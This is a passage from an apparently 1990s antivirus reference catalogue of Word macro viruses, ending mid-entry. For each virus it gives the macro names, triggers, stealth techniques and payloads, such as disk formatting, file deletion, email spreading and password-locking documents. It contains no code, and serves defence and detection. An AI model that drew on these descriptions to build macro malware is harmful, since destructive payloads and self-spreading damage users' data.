  24068. Encrypted: Yes
  24069. Macro names: AutoOpen, Autoexec, AutoNew, FileSaveAs (ToolsMacro,
  24070.              FileTemplates, Monday)
  24071. Size of macros: 4192 or 6082 Bytes
  24072. Place of origin: Taiwan
  24073. Date of origin: Spring 1997
  24074. Destructive: Yes
  24075. Seen In-The-Wild: No
  24076. Description:
  24077.  
  24078. Sam.A is another macro virus that only works with the
  24079. East Asian version of Microsoft Word.  Sam infects the global
  24080. template when an infected document is opened. Further
  24081. documents become infected when they are also opened,
  24082. created, or saved (FileSaveAs).
  24083.  
  24084. Sam has various destructive payloads:
  24085.  
  24086. 1. Every Monday at 10:00, Sam overwrites the AUTOEXEC.BAT
  24087.    file with commands that will format the hard disk upon
  24088.    the next boot-up.
  24089.  
  24090.    It also displays the following messages:
  24091.  
  24092.    "   Taiwan Dark Monday Today is Monday, do you work hard?   "
  24093.    "   It's tea time now! Let's go out and have some fun...    "
  24094.  
  24095. 2. On every Monday the 13th, Sam deletes all .INI file in the
  24096.    C:\WINDOWS directory and then displays the following
  24097.    message:
  24098.  
  24099.    "   It Is Dark Monday...   "
  24100.  
  24101. 3.  When FileTemplates is accessed, Sam shows the message
  24102.     "  Taiwan Dark Monday Go ahead! Make my day!!!   " and
  24103.     then replaces all text with the following:
  24104.  
  24105.     "   TAIWAN DARK MONDAY   "
  24106.  
  24107. 4.  When ToolsMacro is accessed, Sam shows the message
  24108.     "  Taiwan Dark Monday You may insert password to access
  24109.     here..." and encrypts the active document with the following
  24110.     password:
  24111.  
  24112.     "   Samuel   "
  24113.  
  24114. The document that was distributed over the Internet differs in
  24115. one of the macros (ToolsMacr instead of ToolsMacro). Due to
  24116. this macro name change, Sam.A devolves into Sam.A1
  24117. (with only 4 macros instead of 7).  Infected samples with only
  24118. 4 macros are not capable of further infecting documents.
  24119. They are classified as "intended."
  24120.  
  24121. [WORD_Satanic.A]
  24122. Virus name: WORD_Satanic.A
  24123. Virus Type: Word macro virus
  24124. Number of macros: 5
  24125. Encrypted: Yes
  24126. Macro names: AutoOpen, AutoClose, AutoExec, AutoExit, AutoNew
  24127. Size of macros: 53249 Bytes
  24128. Place of origin: Germany
  24129. Date of origin: Summer 1996
  24130. Destructive: Yes
  24131. Common In-The-Wild: No
  24132. Description:
  24133.  
  24134. Satanic activates when an infected document is opened
  24135. (AutoOpen).  Satanic does not infect when the "AutoExit"
  24136. macro already exists in the global template or a document.
  24137. Further documents become infected when they are created
  24138. (AutoNew), closed (AutoClose) or Microsoft Word is exited
  24139. (AutoExit).
  24140.  
  24141. Satanic deletes the Tool/Customize, Tool/Macro and
  24142. Tools/Option menu items to make recognition of an infected
  24143. document more difficult (called macro stealth technique).
  24144.  
  24145. Satanic also inserts "Installed=Yes" into the "Control" section
  24146. of win.ini. If it does not find the entry (first activation or
  24147. deletion) then it tries to drop and launch a DOS-based virus
  24148. (NC.COM).
  24149.  
  24150. Upon exiting Microsoft Word (AutoExit) on October 1st,
  24151. Satanic will format the C drive unconditionally, resulting to
  24152. a loss of valuable information.
  24153.  
  24154. A second payload will activate on September 30th. Satanic
  24155. will then display the following message:
  24156.  
  24157. "   You are infected with Satanic   "
  24158.  
  24159. [WORD_Saver.A (a.k.a. SaverSex)]
  24160. Virus name: WORD_Saver.A (a.k.a. SaverSex)
  24161. Virus Type: Word macro virus
  24162. Number of macros: 1
  24163. Encrypted: Yes
  24164. Macro names: DateiSpeichern
  24165. Size of macros: 602 Bytes
  24166. Place of origin: Austria
  24167. Date of origin: September 1996
  24168. Destructive: No
  24169. Common In-The-Wild: No
  24170. Description:
  24171.  
  24172. Saver activates when an infected document is saved
  24173. (DateiSpeichern).  It does not infect when the "DateiSpeichern"
  24174. macro already exists in the global template. The same is true
  24175. for documents.
  24176.  
  24177. Upon activation of the virus on April 21st the following
  24178. message will be displayed:
  24179.  
  24180. "   Saver(SEX) written by Spooky. Austria 1996   "
  24181.  
  24182. [WORD_ShareFun.A]
  24183. Virus name: WORD_ShareFun.A
  24184. Virus Type: Word macro virus
  24185. Number of macros: 9
  24186. Encrypted: No
  24187. Macro names: AutoExec, AutoOpen, FileExit, FileOpen, FileSave
  24188.              FileClose, ToolsMacro, FileTemplates, ShareTheFun
  24189. Size of macros: 1777
  24190. Place of origin: USA
  24191. Date of origin: 1997
  24192. Payload: Yes
  24193. Common In-The-Wild: Yes
  24194. Description:
  24195.  
  24196. ShareFun infects the global template when an infected
  24197. document is opened (AutoOpen). Further documents become
  24198. infected when they are opened (FileOpen), saved (FileSave),
  24199. closed (FileClose) or on activation of FileExit, ToolsMacro
  24200. and FileTemplates.
  24201.  
  24202. When an infected document is opened, the "ShareTheFun"
  24203. macro is called (probability of 25 percent) and the document
  24204. is saved to the root directory with the following name:
  24205.  
  24206. "Doc1.doc"
  24207.  
  24208. After that ShareFun looks for an active copy of MSMail.
  24209. There are two different outcomes:
  24210.  
  24211. 1. MSMail is inactive
  24212.    Result: Sharefun shuts down Windows.
  24213.  
  24214. 2. MSMail is active
  24215.    Result: Sharefun tries to take control of MSMail and sends
  24216.    3 e-mail messages to 3 randomly picked names from the
  24217.    address book.  Attached to the e-mail message, with the
  24218.    header "You have GOT to read this!", is the infected
  24219.    document.
  24220.  
  24221. By doing this ShareFun tries to spread itself to new users.
  24222.  
  24223. The above payload does not always work.
  24224.  
  24225. ShareFun also uses "ToolsMacro" and "FileTemplates" to make
  24226. recognition of an infected document more difficult (called
  24227. macro stealth technique).
  24228.  
  24229. Even though ShareFun was hyped by the marketing
  24230. department of one anti-virus company, it is very unlikely that
  24231. you will become infected with this virus. It remains to be a
  24232. research virus.
  24233.  
  24234. [WORD_ShareFun]
  24235. Virus name: WORD_ShareFun
  24236. Virus Type: Word macro virus
  24237. Number of macros: 9
  24238. Encrypted: No
  24239. Macro names:
  24240. Size of macros:
  24241. Place of origin:
  24242. Date of origin: February 1997
  24243. Destructive: No
  24244. Common In-The-Wild: No
  24245. Description:
  24246.  
  24247. This virus has 9 macros, all of which are encrypted. This virus
  24248. uses the "ToolsMacro" to make recognition of an infected document
  24249. more difficult (called macro stealth technique).
  24250.  
  24251. The macros are:
  24252.  
  24253. "AutoExec"
  24254. "AutoOpen"
  24255. "FileExit"
  24256. "FileOpen"
  24257. "FileSave"
  24258. "FileClose"
  24259. "ToolsMacro"
  24260. "ShareTheFun"
  24261. "FileTemplates"
  24262.  
  24263. The AutoExec macro sets the DisableAutomacros, while AutoOpen
  24264. randomly selects, with 25% probability, to hook ShareTheFun.
  24265.  
  24266. The Saveall submacro copies the above macros to the global
  24267. template (NORMAL.DOT) and to the new/open document file. (Detected
  24268. by MacroTrap's rule1.)
  24269.  
  24270. The following describes the functions of the other macros:
  24271.  
  24272. 1) FileExit: hooks AutoOpen's Saveall submacro
  24273.  
  24274. 2) FileOpen: hooks AutoOpen's Saveall submacro
  24275.  
  24276. 3) FileSave: hooks AutoOpen's Saveall submacro
  24277.  
  24278. 4) FileClose : hooks AutoOpen's Saveall submacro
  24279.  
  24280. 5) ToolsMacro: disables ToolsMacro and hooks AutoOpen's Saveall
  24281.                submacro
  24282.  
  24283. 6) ShareTheFun : checks whether or not the MSMail is active. If it
  24284.                  is, the virus hooks MSMail then sends 3 e-mail
  24285.                  messages to 3 randomly picked names from the
  24286.                  address book.  Attached to the e-mail message, with
  24287.                  the header "You have GOT to read this!", is the
  24288.                  infected document.
  24289.  
  24290. 7) FileTemplates: hooks AutoOpen's Saveall submacro
  24291.  
  24292. [WORD_Showoff.A (Showofxx)]
  24293. Virus name: WORD_Showoff.A (Showofxx)
  24294. Virus Type: Word macro virus
  24295. Number of macros: 3
  24296. Encrypted: Yes
  24297. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24298. Size of macros: 6789 Bytes
  24299. Place of origin: Unknown
  24300. Date of origin: Unknown
  24301. Payload: No
  24302. Seen In-The-Wild: No
  24303. Description:
  24304.  
  24305. Showoff infects the global template (normal.dot) when an
  24306. infected file is opened. Further documents become infected
  24307. when they are closed.
  24308.  
  24309. Showoff.A is most likely a corrupted "mutation" of another
  24310. variant.  The "Show" macro ("AutoExec" macro after
  24311. infecting the global template) contains invalid Wordbasic
  24312. instructions.  Due to those instructions, Showoff displays the
  24313. following error message when Word is started:
  24314.  
  24315. "   Out of Memory   "
  24316.  
  24317. Microsoft Word is not affected with garbage codes, thus the virus
  24318. is able to infect other documents.
  24319.  
  24320. [WORD_Showoff.B (Showofxx)]
  24321. Virus name: WORD_Showoff.B (Showofxx)
  24322. Virus Type: Word macro virus
  24323. Number of macros: 3
  24324. Encrypted: Yes
  24325. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24326. Size of macros: 7955 Bytes
  24327. Place of origin: Unknown
  24328. Date of origin: January 1997
  24329. Payload: No
  24330. Seen In-The-Wild: No
  24331. Description:
  24332.  
  24333. Showoff.B infects the global template (normal.dot) when an
  24334. infected document is opened. Further documents become
  24335. infected when they are closed.
  24336.  
  24337. The "Show" macro ("AutoExec" macro after infecting the
  24338. global template) contains invalid Wordbasic (corrupted)
  24339. instructions.  Due to those instructions, Showoff displays an
  24340. error message.
  24341.  
  24342. Microsoft Word is not affected with corrupted macros, thus the
  24343. virus is able to infect other documents.
  24344.  
  24345. [WORD_Showoff.C (Showofxx)]
  24346. Virus name: WORD_Showoff.C (Showofxx)
  24347. Virus Type: Word macro virus
  24348. Number of macros: 3
  24349. Encrypted: Yes
  24350. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24351. Size of macros: 4758 Bytes
  24352. Place of origin: Australia
  24353. Date of origin: January 1997
  24354. Payload: No
  24355. Seen In-The-Wild: Yes
  24356. Description:
  24357.  
  24358. ShowOff.C is the original virus for the ShowOff virus family.
  24359. Most likely, other corrupted variants (such as ShowOff.A
  24360. and B) are based on its code.
  24361.  
  24362. ShowOff.C infects the global template (normal.dot) when an
  24363. infected document is opened. Further documents become
  24364. infected when they are closed.
  24365.  
  24366. Unlike other macro viruses, ShowOff.C does not contain any
  24367. destructive payloads. It only displays some messages.
  24368.  
  24369. [WORD_ShowOff.D]
  24370. Virus name: WORD_ShowOff.D
  24371. Virus Type: Word macro virus
  24372. Number of macros: 3
  24373. Encrypted: Yes
  24374. Macro names: AutoOpen, Show, Cfxx
  24375. Size of macros: 6789 Bytes
  24376. Place of origin: Unknown
  24377. Date of origin: February 1997
  24378. Destructive: No
  24379. Common In-The-Wild: No
  24380. Description:
  24381.  
  24382. The difference between this new variant and the original
  24383. ShowOff virus is that the "Show" (AutoExec in the global
  24384. template) macro is corrupted. Due to this corruption, Microsoft
  24385. Word displays the following error message when Word is started:
  24386.  
  24387. "   Out of memory   "
  24388.  
  24389. Even with this error, ShowOff.D is still able to spread and
  24390. infect other documents.
  24391.  
  24392. For more information, please refer to the ShowOff.A virus
  24393. description.
  24394.  
  24395. [WORD_Showoff.E (Showofxx)]
  24396. Virus name: WORD_Showoff.E (Showofxx)
  24397. Virus Type: Word macro virus
  24398. Number of macros: 3
  24399. Encrypted: Yes
  24400. Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec
  24401. Size of macros: 7955 Bytes
  24402. Place of origin: Europe
  24403. Date of origin: January 1997
  24404. Payload: Yes
  24405. Seen In-The-Wild: No
  24406. Description:
  24407.  
  24408. Showoff.E infects the global template (normal.dot) when an
  24409. infected document is opened. Further documents become
  24410. infected when they are closed.
  24411.  
  24412. Showoff.E combines with the Bandung virus, using its destructive
  24413. "AutoExec" macro. The "Show" macro ("AutoExec" macro after infecting
  24414. the global template) contains the destructive code, which is activated
  24415. when Microsoft Word is started.
  24416.  
  24417. For more information, please refer to the Bandung.A virus
  24418. description.
  24419.  
  24420. [WORD_Showoff.F (Showofxx)]
  24421. Virus name: WORD_Showoff.F (Showofxx)
  24422. Virus Type: Word macro virus
  24423. Number of macros: 3
  24424. Encrypted: Yes
  24425. Macro names: AutoOpen, Show, Cfxx, (Ofxx, AutoClose, AutoExec)
  24426. Size of macros: 4758 Bytes
  24427. Place of origin: Unknown
  24428. Date of origin: Spring 1997
  24429. Payload: No
  24430. Seen In-The-Wild: No
  24431. Description:
  24432.  
  24433. ShowOff.F infects the global template (normal.dot) when an
  24434. infected document is opened. Further documents become
  24435. infected when they are closed.
  24436.  
  24437. The main difference between this new variant and previous
  24438. ShowOff viruses is that ShowOff.F does not display the
  24439. following message:
  24440.  
  24441. "   TO ONE OF US, PEACE ! HAPPY BIRTHDAY!!!   "
  24442.  
  24443. [WORD_Simple.A (Intended)]
  24444. Virus name: WORD_Simple.A (Intended)
  24445. Virus Type: Word macro virus
  24446. Number of macros: 2
  24447. Encrypted: Yes
  24448. Macro names: AutoOpen, Simple
  24449. Size of macros: 272 Bytes
  24450. Place of origin: Unknown
  24451. Date of origin: Spring 1997
  24452. Destructive: No
  24453. Seen In-The-Wild: No
  24454. Description:
  24455.  
  24456. Simple.A is another macro virus that does not work properly.
  24457. It is not infectious, therefore it is very unlikely that
  24458. users will run into documents infected with this virus.
  24459.  
  24460. [WORD_Simple.B ]
  24461. Virus name: WORD_Simple.B
  24462. Virus Type: Word macro virus
  24463. Number of macros: 2
  24464. Encrypted: Yes
  24465. Macro names: AutoOpen, Simple
  24466. Size of macros: 264 Bytes
  24467. Place of origin: Unknown
  24468. Date of origin: April 1997
  24469. Destructive: No
  24470. Seen In-The-Wild: No
  24471. Description:
  24472.  
  24473. Simple.B infects the global template when an infected
  24474. document is opened. Further documents become infected
  24475. when they are also opened (AutoOpen).
  24476.  
  24477. The main difference between this new variant and the older
  24478. Simple.A virus is that Simple.B is infectious and also displays
  24479. the following message:
  24480.  
  24481. "   The Concept is Simple!   "
  24482.  
  24483. [WORD_Smiley.A]
  24484. Virus name: WORD_Smiley.A
  24485. Virus Type: Word macro virus
  24486. Number of macros: 8
  24487. Encrypted: Yes
  24488. Macro names: AutoExec, AutoExit, AutoOpen, DateiSpeichern,
  24489.              DateiSpeichernUnter, DateiDrucken, Timer
  24490.              DateiDruckenStandard
  24491. Size of macros: 6435 Bytes
  24492. Place of origin: Germany
  24493. Date of origin: Unknown
  24494. Destructive: Yes
  24495. Seen In-The-Wild: No
  24496. Description:
  24497.  
  24498. Smiley is another macro virus written for the German version
  24499. of Microsoft Word.
  24500.  
  24501. Smiley infects the global template (normal.dot) when an
  24502. infected document is opened.  Further documents become
  24503. infected when they are saved with the DateiSpeichern and
  24504. DateiSpeichernUnter commands.
  24505.  
  24506. To make recognition of an infected document more difficult,
  24507. Smiley removes the Extras/Makro and Datei/Dokumentvorlage
  24508. option (called macro stealth technique).
  24509.  
  24510. When Word is started (AutoExec), Smiley puts the string
  24511. "Smiley=xx" into the [windows] section of win.ini (inside the
  24512. Windows directory).  "xx" represents a number.
  24513.  
  24514. 14 days after the first infection, Smiley changes the
  24515. Tools/Options/Userinfo to the following:
  24516.  
  24517. "   Name: Smiley Corporation   "
  24518. "   Initials:   SC   "
  24519. "   Address:   Greenpeace   "
  24520.  
  24521. Furthermore, Smiley removes the following menu items:
  24522.  
  24523. Datei/Makro
  24524. Datei/Dokumentvorlage
  24525. Ansicht/Symbolleisten
  24526. Extras/Anpassen
  24527.  
  24528. 56 days after the first infection, Smiley creates a new
  24529. C:\AUTOEXEC.BAT file and formats the hard drive upon the next
  24530. boot-up.
  24531.  
  24532. Upon Exiting Word (AutoExit), Smiley displays various
  24533. messages and adds them at the end of a printed document.
  24534.  
  24535. [WORD_Snickers.A ]
  24536. Virus name: WORD_Snickers.A
  24537. Virus Type: Word macro virus
  24538. Number of macros: 2
  24539. Encrypted: No
  24540. Macro names: AutoOpen, AutoClose
  24541. Size of macros: 420 Bytes
  24542. Place of origin: Unknown
  24543. Date of origin: Spring 1997
  24544. Destructive: Yes
  24545. Seen In-The-Wild: No
  24546. Description:
  24547.  
  24548. Snickers.A does not infect the global template (normal.dot)
  24549. unlike many other macro viruses. It uses a new type of infection
  24550. (called direct action). It infects documents during the following
  24551. processes:
  24552.  
  24553. 1. An uninfected document is opened.
  24554.    It becomes listed in the MRU (Most recently used) list.
  24555.  
  24556. 2. An infected document is opened.
  24557.    The virus tries to infect all the files listed in the MRU list.
  24558.  
  24559. Snickers has another annoying payload (AutoClose). During
  24560. infection, it encrypts the text by swapping adjacent characters.
  24561. The text is decrypted when an infected document is opened
  24562. (AutoOpen).
  24563.  
  24564. Virus scanners that only remove the macros will have the document
  24565. text encrypted.
  24566.  
  24567. [WORD_Spooky.A]
  24568. Virus name: WORD_Spooky.A
  24569. Virus Type: Word macro virus
  24570. Number of macros: 9
  24571. Encrypted: Yes
  24572. Macro names: autoexec, AutoOpen, dateidokvorlagen, dateidrucken,
  24573.              dateidruckenstandard, extrasmakro, DateiSpeichernUnter,
  24574.              DateiOeffnen, Spooky
  24575. Size of macros: 3114 Bytes
  24576. Place of origin: Austria
  24577. Date of origin: September 1996
  24578. Payload: Yes
  24579. Common In-The-Wild: No
  24580. Description:
  24581.  
  24582. Spooky activates when an infected document is opened
  24583. (AutoOpen).  Further documents become infected when they
  24584. are opened (DateiOeffnen) or saved (DateiSpeichernUnter).
  24585. Spooky does not infect when the "Spooky" macro already
  24586. exists in the global template (normal.dot) or a document.
  24587.  
  24588. Spooky disables the File/Templates and Tools/Macro menu
  24589. items in order to make recognition of an infected file more
  24590. difficult (called macro stealth technique).
  24591.  
  24592. If a user tries to select one of the two options he/she is prompted
  24593. for a password. Upon entering "ykoops" at the prompt in the
  24594. status bar, the original menus reappear. Entering an incorrect
  24595. password displays the following message:
  24596.  
  24597. "   Sie haben das falsche Passwort eingegeben   "
  24598.  
  24599. translated:
  24600.  
  24601. "   You have entered the wrong password   "
  24602.  
  24603.  
  24604. Spooky randomly displays the following message in the
  24605. status bar:
  24606.  
  24607. "   Word.Spooky   "
  24608.  
  24609. When a user prints out a document with the system time between
  24610. 55 and 59, Spooky inserts the following text at the end
  24611. of the printout:
  24612.  
  24613. "   WORD_Spooky   "
  24614.  
  24615. [WORD_Stryx.A ]
  24616. Virus name: WORD_Stryx.A
  24617. Virus Type: Word macro virus
  24618. Number of macros: 4
  24619. Encrypted: Yes
  24620. Macro names: DateiSchliessen, DokumentSchliessen, Stryx1,
  24621.              Stryx2, StryxOne, StryxTwo
  24622. Size of macros: 25669 Bytes
  24623. Place of origin: Germany
  24624. Date of origin: September 1996
  24625. Payload: Yes
  24626. Common In-The-Wild: No
  24627. Description:
  24628.  
  24629. While Stryx has 4 macros, some of them are only available in
  24630. the global template or in documents.
  24631.  
  24632. "Stryx1" (only in the global template)
  24633. "Stryx2" (only in the global template)
  24634. "StryxOne" (only in documents)
  24635. "StryxTwo" (only in documents)
  24636.  
  24637. Activation of Stryx occurs when a document is closed
  24638. (DateiSchliessen and DokumentSchliessen). Stryx then
  24639. modifies the "Int1" section of win.ini (Windows directory).
  24640. It sets a YES to the value of the installed init string and creates
  24641. a .GIF picture of a dragon (based on a hex dump).
  24642. Upon closing a document on December 1st, a new document
  24643. is created and the picture of the dragon is inserted. Followed
  24644. by the dragon is:
  24645.  
  24646. "   STRYX!!!!    "
  24647. "   Look at your HD! :-)   "
  24648. "   Sorry, but it's so funny!   "
  24649. "   NJ 1996   "
  24650.  
  24651. Stryx does not infect when the "Stryx2" macro already exists
  24652. in the global template or when the "StryxTwo" macro already
  24653. exists in a document.
  24654.  
  24655. [WORD_Surabaya.A]
  24656. Virus name: WORD_Surabaya.A
  24657. Virus Type: Word macro virus
  24658. Alias: WORD_Ice.Man
  24659. Number of macros: 6
  24660. Encrypted: No
  24661. Macro names: AutoExec, AutoOpen, Plong, FileSaveAs
  24662.              ToolsMacro, FileTemplates
  24663. Size of macros: 1832 Bytes
  24664. Place of origin: Unknown
  24665. Date of origin: Spring 1997
  24666. Payload: Yes
  24667. Seen In-The-Wild: Yes
  24668. Description:
  24669.  
  24670. Surabaya infects the global template (normal.dot) when an
  24671. infected document is opened. Further documents become
  24672. infected when they are saved (FileSaveAs).
  24673.  
  24674. Surabaya uses ToolsMacro and FileTemplates to make
  24675. recognition of an infected document more difficult (called
  24676. macro stealth technique).  We advise not to access the two
  24677. menu items, since they often execute the viral code. In case of
  24678. Surabaya, they display a message with "   Sorry...   " in it.
  24679.  
  24680. Whenever Microsoft Word is started from an infected global
  24681. template, the following message is displayed in the status bar:
  24682.  
  24683. "   Lontong Micro Device ( c ) 1993 By ICE-Man   "
  24684.  
  24685. Surabaya also adds the following text to the "Author" section of
  24686. C:\WINDOWS\WIN.INI:
  24687.  
  24688. "   Name=TebeYe'93 The ICE-Man   "
  24689.  
  24690. [WORD_Ice.Man]
  24691. Virus name: WORD_Ice.Man
  24692. Virus Type: Word macro virus
  24693. Alias: WORD_Surabaya.A
  24694. Number of macros: 6
  24695. Encrypted: No
  24696. Macro names: AutoExec, AutoOpen, Plong, FileSaveAs
  24697.              ToolsMacro, FileTemplates
  24698. Size of macros: 1832 Bytes
  24699. Place of origin: Unknown
  24700. Date of origin: Spring 1997
  24701. Payload: Yes
  24702. Seen In-The-Wild: Yes
  24703. Description:
  24704.  
  24705. Ice.Man infects the global template (normal.dot) when an
  24706. infected document is opened. Further documents become
  24707. infected when they are saved (FileSaveAs).
  24708.  
  24709. Ice.Man uses ToolsMacro and FileTemplates to make
  24710. recognition of an infected document more difficult (called
  24711. macro stealth technique).  We advise not to access the two
  24712. menu items, since they often execute the viral code. In case of
  24713. Ice.Man, they display a message with "   Sorry...   " in it.
  24714.  
  24715. Whenever Microsoft Word is started from an infected global
  24716. template, the following message is displayed in the status bar:
  24717.  
  24718. "   Lontong Micro Device ( c ) 1993 By ICE-Man   "
  24719.  
  24720. Ice.Man also adds the following text to the "Author" section of
  24721. C:\WINDOWS\WIN.INI:
  24722.  
  24723. "   Name=TebeYe'93 The ICE-Man   "
  24724.  
  24725.  
  24726.  
  24727. [WORD_Switcher.a]
  24728. Virus name: WORD_Switcher.a
  24729. Virus Type: Word macro virus
  24730. Number of macros: 10
  24731. Encrypted: Yes
  24732. Macro names: AutoExec, AutoOpen, Autoclose, FileOpen, FileSave
  24733.              FileSaveAs, FileClose, FilePrint, FileTemplates,
  24734.              Toolsmacro
  24735. Size of macros: 2328 Bytes
  24736. Place of origin: Unknown
  24737. Date of origin: April 1997
  24738. Destructive: Yes
  24739. Seen In-The-Wild: Yes
  24740. Description:
  24741.  
  24742. Switcher activates when an infected document is opened.
  24743.  
  24744. It uses "ToolsMacro" and "FileTemplates" to make recognition
  24745. of an infected document more difficult (called macro stealth
  24746. technique).  When a user selects one of the two menu items, it
  24747. displays the following message:
  24748.  
  24749. "   Configuration conflict - menu item is not available.   "
  24750.  
  24751. Switcher has various destructive payloads. When Microsoft
  24752. Word is started (AutoExec), Switcher triggers (probability of
  24753. 1/60) and tries to delete one of the following:
  24754.  
  24755. "   c:\msoffice\excel\*.xls   "   (Microsoft Excel Spreadsheets)
  24756.  
  24757. "   c:\access\*.mdb   "   (Microsoft Access database files)
  24758.  
  24759. "   c:\msoffice\access\*.mdb   "   (Microsoft Access database files)
  24760.  
  24761. "   c:\windows\*.grp   "   (Windows files
  24762.  
  24763. "   c:\*.hlp   "   (Windows Help files)
  24764.  
  24765. The second payload (located in AutoClose) checks the seconds
  24766. time field and in case of a value of less than 10, it
  24767. generates two random digits and changes all instances of 1.
  24768.  
  24769. Example: "1" is replaced by "2" in the active document.
  24770.  
  24771. In addition, the following messages can be found in the "AutoExec"
  24772. macro:
  24773.  
  24774. "   *** I'm a little pest! ***   "
  24775. "   The LITTLE PEST self-propagating macro is by *Sly Ellga*,   "
  24776. "   a guy who thinks it's funny to screw around
  24777. "   with other people's data   "
  24778.  
  24779. [WORD_Swlabsl (Kit) (a.k.a. 1.0a)]
  24780. Virus Name: WORD_Swlabs1 (Kit) (a.k.a. 1.0a)
  24781. Virus Type: Word macro virus
  24782. Size of executable: 117,248 Bytes
  24783. Place of origin: USA
  24784. Date of origin: January 1997
  24785. Description:
  24786.  
  24787. Swlabs1 is another Microsoft Word construction kit written
  24788. in Microsoft Visual C++ for Win32. It is presented as a text
  24789. editor with a virus creation wizard.
  24790.  
  24791. There are two ways of creating new viruses:
  24792.  
  24793. 1. Virus source *only* if no copy of Microsoft Word is found.
  24794.  
  24795. 2. Fully functional macro virus if Microsoft Word is found.
  24796.  
  24797. Swlabs1 uses the document "SKAMMY.DOC" when
  24798. communicating with Microsoft Word. It contains the macro
  24799. "Test" (2137 Bytes), which pastes the source from the
  24800. clipboard, breaks them into different macros and then exits
  24801. Word to go back to the Swlabs construction kit.
  24802.  
  24803. [WORD_Swlabs.A (aka. Skam)]
  24804. Virus name: WORD_Swlabs.A (aka. Skam)
  24805. Virus Type: Word macro virus
  24806. Number of macros: 1
  24807. Encrypted: No
  24808. Macro names: AutoOpen
  24809. Size of macros: 512 Bytes
  24810. Place of origin: Unknown
  24811. Date of origin: Spring 1997
  24812. Destructive: No
  24813. Seen In-The-Wild: Yes
  24814. Description:
  24815.  
  24816. Swlabs.A infects the global template (normal.dot) when
  24817. an infected document is opened. Further documents become
  24818. infected when they are also opened (AutoOpen).
  24819.  
  24820. Swlabs.A removes ToolsMacro and FileTemplates to make
  24821. recognition of an infected file more difficult (called
  24822. macro stealth technique).
  24823.  
  24824. It does not contain any payload only the following comment:
  24825.  
  24826. "   What" No Payload? WUSSY!   "
  24827.  
  24828. Swlabs.A is another virus that was created with a macro
  24829. virus generator.
  24830.  
  24831. [WORD_Swlabs.B]
  24832. Virus name: WORD_Swlabs.B
  24833. Virus Type: Word macro virus
  24834. Number of macros: 3
  24835. Encrypted: No
  24836. Macro names: AutoOpen, FileNew, FileSave
  24837. Size of macros: 2145 Bytes
  24838. Place of origin: Unknown
  24839. Date of origin: Spring 1997
  24840. Destructive: No
  24841. Seen In-The-Wild: No
  24842. Description:
  24843.  
  24844. Swlabs.B infects the global template (normal.dot) when
  24845. an infected document is opened. Further documents become
  24846. infected when they are also opened (AutoOpen), created
  24847. (FileNew), or saved (FileSave).
  24848.  
  24849. Swlabs.B does not contain any destructive payload only the
  24850. following comment is added to the File|Properties\Summary|
  24851. Subject section:
  24852.  
  24853. "   Green Bay Packers -- Super Bowl XXXI Champions  "
  24854.  
  24855. Swlabs.B is another virus that was created with a macro
  24856. virus generator.
  24857.  
  24858. [WORD_Talon.A]
  24859. Virus name: WORD_Talon.A
  24860. Virus Type: Word macro virus
  24861. Number of macros: 6
  24862. Encrypted: Yes
  24863. Macro names: AOB, Deed, FSAB, Info, AutoOpen (FileSaveAs),
  24864.              ToolsMacro
  24865. Size of macros: 2052 Bytes in documents
  24866.                 2008 Bytes in global template
  24867. Place of origin: USA
  24868. Date of origin: March 1997
  24869. Payload: Yes
  24870. Seen In-The-Wild: No
  24871. Description:
  24872.  
  24873. Talon infects the global template (normal.dot) when an
  24874. infected document is opened (AutoOpen). Further documents
  24875. become infected when they are saved (FileSaveAs).
  24876.  
  24877. Talon triggers on June 18th. It then displays an unending
  24878. series of message boxes:
  24879.  
  24880. "   Your System Is Infected With The Macro Virus Talon #1!   "
  24881. "   This Macro Virus Was Brought To You By: TALON 1997   ".
  24882.  
  24883. When the user tries to select the "ToolsMacro" menu option,
  24884. Talon displays the following information:
  24885.  
  24886. "   Warning   "
  24887. "   This Option Is Not Available, Please Insert The MS-Office CD   "
  24888. "   And Install The Help Files To Continue.   "
  24889.  
  24890. Additional information can be found in the "Info" macro:
  24891.  
  24892. "    *********************************************   "
  24893. "                  Talon #1                          "
  24894. "           June 18 Payload Activates                "
  24895. "               Displays Message                     "
  24896. "       All Files Encrypted Except Info File         "
  24897. "                                                    "
  24898. "              Brought To You By                     "
  24899. "                   "Talon"                          "
  24900. "    *********************************************   "
  24901.  
  24902. [WORD_Talon.B]
  24903. Virus name: WORD_Talon.B
  24904. Virus Type: Word macro virus
  24905. Number of macros: 6
  24906. Encrypted: Yes
  24907. Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs),
  24908.              ToolsMacro, Password
  24909. Size of macros: 1953 Bytes in documents
  24910.                 1887 Bytes in global template
  24911. Place of origin: USA
  24912. Date of origin: March 1997
  24913. Payload: Yes
  24914. Seen In-The-Wild: No
  24915. Description:
  24916.  
  24917. Talon.B infects the global template (normal.dot) when an
  24918. infected document is opened (AutoOpen). Further documents
  24919. become infected when they are saved (FileSaveAs).
  24920.  
  24921. It triggers on the 27th of each month when it saves the active
  24922. document with the password "   talon   " and then displays the
  24923. following message:
  24924.  
  24925. "   Warning   "
  24926. "   Your document Has Just been Been Saved, I Hope You Know   "
  24927. "   The Password!!!   ",  Brought To You By Talon 1997   "
  24928.  
  24929. Another difference between this new variant and the original
  24930. Talon virus is that the "ToolsMacro" menu option displays the
  24931. following information:
  24932.  
  24933. "   This Option Is Not Available, Please Install The   "
  24934. "    Help Files To Continue.   "
  24935.  
  24936. [WORD_Talon.C]
  24937. Virus name: WORD_Talon.C
  24938. Virus Type: Word macro virus
  24939. Number of macros: 6
  24940. Encrypted: Yes
  24941. Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs),
  24942.              ToolsMacro, ToolsSpelling
  24943. Size of macros: 2001 Bytes in documents
  24944.                 1981 Bytes in global template
  24945. Place of origin: USA
  24946. Date of origin: March 1997
  24947. Payload: Yes
  24948. Seen In-The-Wild: No
  24949. Description:
  24950.  
  24951. Talon.C infects the global template (normal.dot) when an
  24952. infected document is opened (AutoOpen). Further documents
  24953. become infected when they are saved (FileSaveAs).
  24954.  
  24955. It triggers on Mondays during the month of June. This
  24956. only happens when a user activates the spellchecker.
  24957. Talon.C then saves the active document with the password
  24958. "  talon3  " and then loops through three message boxes:
  24959.  
  24960. "   I Have A Word For You To Spell V I R U S   "
  24961.  
  24962. "   Your document Has Just been Been Saved By The Word Macro Virus   "
